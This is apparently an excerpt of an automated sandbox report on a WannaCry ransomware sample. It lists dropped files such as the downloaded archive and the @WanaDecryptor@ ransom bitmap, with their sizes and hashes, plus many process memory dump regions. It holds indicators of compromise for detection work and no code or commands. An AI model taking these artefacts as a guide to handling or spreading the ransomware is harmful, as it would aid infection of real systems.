                                                                                                      4550dd1787deb353ebd28363dd2cdccca861f6a5d9358120fa6aa23baa478b2a9eb43cef5e3f6426f708a0753491710ac05483fac4a046c26bec4234122434d5

                                                                                                    • C:\Users\Admin\Downloads\Ransomware.WannaCry.zip.crdownload
                                                                                                      Filesize

                                                                                                      3.3MB

                                                                                                      MD5

                                                                                                      efe76bf09daba2c594d2bc173d9b5cf0

                                                                                                      SHA1

                                                                                                      ba5de52939cb809eae10fdbb7fac47095a9599a7

                                                                                                      SHA256

                                                                                                      707a9f323556179571bc832e34fa592066b1d5f2cac4a7426fe163597e3e618a

                                                                                                      SHA512

                                                                                                      4a1df71925cf2eb49c38f07c6a95bea17752b025f0114c6fd81bc0841c1d1f2965b5dda1469e454b9e8207c2e0dfd3df0959e57166620ccff86eeeb5cf855029

                                                                                                    • C:\Users\Default\Desktop\@WanaDecryptor@.bmp
                                                                                                      Filesize

                                                                                                      1.4MB

                                                                                                      MD5

                                                                                                      c17170262312f3be7027bc2ca825bf0c

                                                                                                      SHA1

                                                                                                      f19eceda82973239a1fdc5826bce7691e5dcb4fb

                                                                                                      SHA256

                                                                                                      d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa

                                                                                                      SHA512

                                                                                                      c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

                                                                                                    • \??\pipe\crashpad_2152_QRJBIEMQOACPVVMJ
                                                                                                      MD5

                                                                                                      d41d8cd98f00b204e9800998ecf8427e

                                                                                                      SHA1

                                                                                                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                      SHA256

                                                                                                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                      SHA512

                                                                                                      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                    • memory/2316-1123-0x000002A83F840000-0x000002A83F935000-memory.dmp
                                                                                                      Filesize

                                                                                                      980KB

                                                                                                    • memory/2728-2451-0x0000000073930000-0x0000000073B4C000-memory.dmp
                                                                                                      Filesize

                                                                                                      2.1MB

                                                                                                    • memory/2728-2453-0x0000000000680000-0x000000000097E000-memory.dmp
                                                                                                      Filesize

                                                                                                      3.0MB

                                                                                                    • memory/2728-2450-0x00000000738A0000-0x0000000073922000-memory.dmp
                                                                                                      Filesize

                                                                                                      520KB

                                                                                                    • memory/2728-2435-0x0000000073930000-0x0000000073B4C000-memory.dmp
                                                                                                      Filesize

                                                                                                      2.1MB

                                                                                                    • memory/2728-2436-0x00000000738A0000-0x0000000073922000-memory.dmp
                                                                                                      Filesize

                                                                                                      520KB

                                                                                                    • memory/2728-2437-0x0000000073B50000-0x0000000073B72000-memory.dmp
                                                                                                      Filesize

                                                                                                      136KB

                                                                                                    • memory/2728-2438-0x0000000000680000-0x000000000097E000-memory.dmp
                                                                                                      Filesize

                                                                                                      3.0MB

                                                                                                    • memory/2728-2445-0x0000000000680000-0x000000000097E000-memory.dmp
                                                                                                      Filesize

                                                                                                      3.0MB

                                                                                                    • memory/2728-2446-0x0000000073C20000-0x0000000073CA2000-memory.dmp
                                                                                                      Filesize

                                                                                                      520KB

                                                                                                    • memory/2728-2447-0x0000000073C00000-0x0000000073C1C000-memory.dmp
                                                                                                      Filesize

                                                                                                      112KB

                                                                                                    • memory/2728-2448-0x0000000073B80000-0x0000000073BF7000-memory.dmp
                                                                                                      Filesize

                                                                                                      476KB

                                                                                                    • memory/2728-2449-0x0000000073B50000-0x0000000073B72000-memory.dmp
                                                                                                      Filesize

                                                                                                      136KB

                                                                                                    • memory/2728-2434-0x0000000073C20000-0x0000000073CA2000-memory.dmp
                                                                                                      Filesize

                                                                                                      520KB

                                                                                                    • memory/3304-418-0x0000021922340000-0x0000021922341000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/3304-413-0x0000021922340000-0x0000021922341000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/3304-422-0x0000021922340000-0x0000021922341000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/3304-419-0x0000021922340000-0x0000021922341000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/3304-420-0x0000021922340000-0x0000021922341000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/3304-417-0x0000021922340000-0x0000021922341000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/3304-421-0x0000021922340000-0x0000021922341000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/3304-412-0x0000021922340000-0x0000021922341000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/3304-423-0x0000021922340000-0x0000021922341000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/3304-411-0x0000021922340000-0x0000021922341000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/3804-141-0x00007FFBBB380000-0x00007FFBBB381000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/4212-163-0x00007FFBBABA0000-0x00007FFBBABA1000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/4212-162-0x00007FFBBB6C0000-0x00007FFBBB6C1000-memory.dmp
                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/4524-1076-0x0000000010000000-0x0000000010010000-memory.dmp
                                                                                                      Filesize

                                                                                                      64KB